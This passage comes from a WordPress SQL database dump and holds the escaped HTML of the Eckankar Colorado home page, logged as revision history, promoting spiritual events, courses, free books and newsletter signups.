\'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>');
INSERT INTO `wpcl_simple_history_contexts` VALUES (236930,40271,'_server_remote_addr','76.130.120.x'),(236931,40271,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236932,40272,'post_id','7160'),(236933,40272,'post_type','page'),(236934,40272,'post_title','Home'),(236935,40272,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -135px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p 